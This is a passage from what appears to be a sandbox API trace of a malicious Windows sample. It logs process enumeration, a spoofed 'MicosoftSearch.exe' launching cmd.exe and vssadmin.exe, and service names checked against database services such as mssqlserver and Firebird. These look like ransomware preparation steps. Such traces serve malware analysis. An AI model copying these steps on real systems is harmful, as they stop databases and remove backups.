returned 11 [0039.416] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.417] lstrlenW (lpString="svchost.exe") returned 11 [0039.417] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.418] lstrlenW (lpString="svchost.exe") returned 11 [0039.418] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.419] lstrlenW (lpString="svchost.exe") returned 11 [0039.419] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0039.419] lstrlenW (lpString="audiodg.exe") returned 11 [0039.419] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.420] lstrlenW (lpString="svchost.exe") returned 11 [0039.420] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.421] lstrlenW (lpString="svchost.exe") returned 11 [0039.421] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0039.421] lstrlenW (lpString="dwm.exe") returned 7 [0039.422] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0039.422] lstrlenW (lpString="explorer.exe") returned 12 [0039.422] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0039.423] lstrlenW (lpString="spoolsv.exe") returned 11 [0039.424] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0039.424] lstrlenW (lpString="taskhost.exe") returned 12 [0039.424] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.425] lstrlenW (lpString="svchost.exe") returned 11 [0039.425] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0039.426] lstrlenW (lpString="taskeng.exe") returned 11 [0039.426] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0039.426] lstrlenW (lpString="taskhost.exe") returned 12 [0039.427] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0039.427] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0039.427] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0039.428] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0039.428] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0039.429] lstrlenW (lpString="sa_shape.exe") returned 12 [0039.429] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0039.429] lstrlenW (lpString="confidence.exe") returned 14 [0039.430] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0039.430] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0039.430] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0039.431] lstrlenW (lpString="blue.exe") returned 8 [0039.431] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0039.432] lstrlenW (lpString="newly debut.exe") returned 15 [0039.432] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0039.433] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0039.433] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0039.433] lstrlenW (lpString="archive.exe") returned 11 [0039.433] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0039.434] lstrlenW (lpString="defend.exe") returned 10 [0039.434] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0039.435] lstrlenW (lpString="arservice.exe") returned 13 [0039.435] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0039.436] lstrlenW (lpString="rr-programmer.exe") returned 17 [0039.436] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0039.436] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0039.436] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0039.437] lstrlenW (lpString="twistedmonton.exe") returned 17 [0039.437] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0039.438] lstrlenW (lpString="arc plains.exe") returned 14 [0039.438] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0039.528] lstrlenW (lpString="americahousestip.exe") returned 20 [0039.534] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0039.534] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0039.535] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0039.535] lstrlenW (lpString="medical lectures.exe") returned 20 [0039.535] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0039.536] lstrlenW (lpString="electronic.exe") returned 14 [0039.536] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0039.537] lstrlenW (lpString="regression.exe") returned 14 [0039.537] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0039.537] lstrlenW (lpString="county.exe") returned 10 [0039.537] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0039.538] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0039.538] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0039.539] lstrlenW (lpString="dllhost.exe") returned 11 [0039.539] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0039.540] lstrlenW (lpString="dllhost.exe") returned 11 [0039.540] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0039.540] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0039.540] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0039.541] lstrlenW (lpString="cmd.exe") returned 7 [0039.541] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0039.542] lstrlenW (lpString="conhost.exe") returned 11 [0039.542] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0039.543] lstrlenW (lpString="vssadmin.exe") returned 12 [0039.543] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0039.543] lstrlenW (lpString="VSSVC.exe") returned 9 [0039.543] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.544] lstrlenW (lpString="svchost.exe") returned 11 [0039.544] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0039.545] CloseHandle (hObject=0x1bc) returned 1 [0039.545] Sleep (dwMilliseconds=0x1f4) [0040.417] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4232d88 [0040.694] EnumServicesStatusExW (in: hSCManager=0x4232d88, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0040.695] GetLastError () returned 0xea [0040.695] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xba5bf8 [0040.695] EnumServicesStatusExW (in: hSCManager=0x4232d88, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xba5bf8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xba5bf8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0040.696] CloseServiceHandle (hSCObject=0x4232d88) returned 1 [0040.697] lstrlenW (lpString="Appinfo") returned 7 [0040.697] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0040.697] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0040.697] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0040.697] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0040.697] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0040.697] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0040.697] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0040.697] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0040.697] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0040.697] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0040.697] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0040.697] lstrlenW (lpString="AudioSrv") returned 8 [0040.697] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0040.697] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0040.697] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0040.697] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0040.697] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0040.697] lstrlenW (lpString="BFE") returned 3 [0040.697] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0040.697] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0040.697] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0040.697] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0040.697] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0040.697] lstrlenW (lpString="CryptSvc") returned 8 [0040.697] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0040.697] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0040.697] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0040.697] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0040.697] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0040.697] lstrlenW (lpString="CscService") returned 10 [0040.697] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0040.697] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0040.698] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0040.698] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0040.698] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0040.698] lstrlenW (lpString="DcomLaunch") returned 10 [0040.698] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0040.698] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0040.698] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0040.698] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0040.698] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0040.698] lstrlenW (lpString="Dhcp") returned 4 [0040.698] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0040.698] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0040.698] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0040.698] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0040.698] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0040.698] lstrlenW (lpString="Dnscache") returned 8 [0040.698] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0040.698] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0040.698] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0040.698] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0040.698] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0040.698] lstrlenW (lpString="DPS") returned 3 [0040.698] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0040.698] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0040.698] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0040.698] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0040.698] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0040.698] lstrlenW (lpString="eventlog") returned 8 [0040.698] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0040.698] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0040.698] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0040.698] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0040.698] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0040.698] lstrlenW (lpString="EventSystem") returned 11 [0040.699] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0040.699] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0040.699] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0040.699] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0040.699] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0040.699] lstrlenW (lpString="gpsvc") returned 5 [0040.699] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0040.699] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0040.699] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0040.699] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0040.699] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0040.699] lstrlenW (lpString="iphlpsvc") returned 8 [0040.699] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0040.699] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0040.699] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0040.699] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0040.699] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0040.699] lstrlenW (lpString="LanmanServer") returned 12 [0040.699] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0040.699] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0040.699] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0040.699] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0040.699] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0040.699] lstrlenW (lpString="LanmanWorkstation") returned 17 [0040.699] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0040.699] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0040.699] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0040.699] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0040.699] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0040.699] lstrlenW (lpString="lmhosts") returned 7 [0040.699] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0040.699] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0040.699] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0040.699] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0040.700] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0040.700] lstrlenW (lpString="MMCSS") returned 5 [0040.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0040.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0040.700] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0040.700] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0040.700] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0040.700] lstrlenW (lpString="MpsSvc") returned 6 [0040.700] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0040.700] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0040.700] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0040.700] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0040.700] lstrcmpiW 